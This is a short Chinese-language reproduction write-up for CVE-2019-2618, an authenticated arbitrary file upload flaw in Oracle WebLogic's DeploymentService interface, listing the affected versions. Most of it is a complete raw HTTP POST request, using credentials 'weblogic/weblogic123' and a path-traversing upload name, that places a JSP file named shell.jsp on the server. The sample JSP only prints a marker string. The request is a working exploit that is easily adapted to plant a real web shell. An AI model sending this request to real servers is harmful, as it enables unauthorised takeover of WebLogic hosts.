漏洞影响介绍:
CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件。攻击者突破了OAM(OracleAccessManagement)认证,设置wl_request_type参数为app_upload,构造文件上传格式的POST请求包,上传jsp木马文件,进而可以获得整个服务器的权限。
影响版本:WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
漏洞复现:
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
username: weblogic
wl_request_type: app_upload
cache-control: no-cache
wl_upload_application_name:/../tmp/_WL_internal/bea_wls_internal/9j4dqk/war
serverName: zhengjim
password: weblogic123
content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
archive: true
server_version: 10.3.6.0
wl_upload_delta: true
Content-Length: 218
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
Content-Type: false
<%
out.print("123456");
%>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
多收集weblogic 版本路径地址: 成功上传如下图!
网友评论